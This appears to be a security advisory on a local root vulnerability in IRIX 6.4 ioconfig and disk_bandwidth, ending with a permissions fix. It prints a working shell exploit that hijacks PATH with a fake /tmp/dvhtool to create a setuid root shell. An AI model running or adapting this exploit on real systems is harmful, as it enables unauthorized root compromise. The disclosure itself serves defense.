COMMAND

    ioconfig and disk_bandwidth

SYSTEMS AFFECTED

    Onyx2 and Origin

PROBLEM

    The IRIX ioconfig(1M)  program assigns logical  controller numbers
    to all I/O devices on  a Silicon Graphics Origin or  Onyx2 system.
    The  IRIX  disk_bandwidth(1M)  program  is  used  to determine the
    number of  I/O operations  that can  be performed  on a given disk
    device on an Origin or  Onyx2 system.  Both programs  are normally
    only  used  by  IRIX  System  administrators.   Unfortunately,   a
    vulnerability  has  been  discovered  in  both  ioconfig(1M)   and
    disk_bandwidth(1M) programs that can lead to a root compromise  of
    the system.

    What follows is simple exploit  making use of stupid system  calls
    to  programs   without  using   a  path.    This  works   on  both
    /sbin/ioconfig   and   /sbin/disk_bandwidth.    Credit   goes   to
    Loneguard.

        #!/bin/sh
        #
        # Irix 6.4 ioconfig xploit - Loneguard 04/12/97
        #
        #
        cat > /tmp/dvhtool << 'EOF'
        #!/bin/sh
        /sbin/cp /bin/csh /tmp/xsh
        /sbin/chmod 14755 /tmp/xsh
        EOF
        /sbin/chmod 700 /tmp/dvhtool
        PATH=/tmp:$PATH
        /sbin/ioconfig -f /hw

SOLUTION

     The  steps  below  can  be  used  to  remove the vulnerability by
     restricting  permissions  of  the ioconfig(1M)/disk_bandwidth(1M)
     programs to the root user.

        1) Become the root user on the system.
        2) Verify   the  vulnerable    ioconfig(1M)/disk_bandwidth(1M)
           programs are installed. Only IRIX 6.4 S2MP for Origin/Onyx2
           is vulnerable (uname -R)
        3) Remove  permissions  on  the  vulnerable  ioconfig(1M)  and
           disk_bandwidth(1M) programs (/bin/chmod 500 for both)